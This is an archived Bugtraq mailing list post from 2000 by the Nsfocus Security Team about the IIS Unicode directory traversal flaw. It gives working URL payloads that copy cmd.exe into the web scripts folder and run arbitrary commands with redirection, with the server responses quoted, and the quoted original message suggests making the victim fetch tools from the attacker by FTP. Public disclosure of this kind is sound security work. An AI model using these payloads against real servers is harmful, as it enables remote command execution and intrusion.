Bugtraq mailing list archives
Re: IIS Unicode
From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Wed, 25 Oct 2000 16:12:13 +0800
If we copy and rename "cmd.exe" to another filename , the limit can be bypassed. (1) copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe" http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe IIS returned : "CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 1 file(s) copied." (2) run "cmd1.exe /c echo abc >aaa & dir & type aaa " http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa IIS returned : " Directory of c:\inetpub\scripts 10/25/2000 03:48p <DIR> . 10/25/2000 03:48p <DIR> .. 10/25/2000 03:51p 6 aaa 12/07/1999 05:00a 236,304 cmd1.exe .. abc " ---Original Message---
Bugtraq ID 1806, http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies: I was having problems executing a command that contains a redirect (>) using any of the IIS Unicode exploits (including my own exploits on security focus ;) ). If anyone can get a redirect working, please let me know. In order to get some interesting tools on the victim, you would probably want to have the victim to FTP to the attacker. Problem without redirect is that you cannot build the FTP command file, and you are a bit stuck.
[snip]
------------------------------------------------------ Roelof W Temmingh SensePost IT security
Regards, Nsfocus Security Team <security () nsfocus com> http://www.nsfocus.com
Current thread:
- IIS Unicode Roelof Temmingh (Oct 25)
- Re: IIS Unicode Ryan Yagatich (Oct 26)
- <Possible follow-ups>
- Re: IIS Unicode Nsfocus Security Team (Oct 26)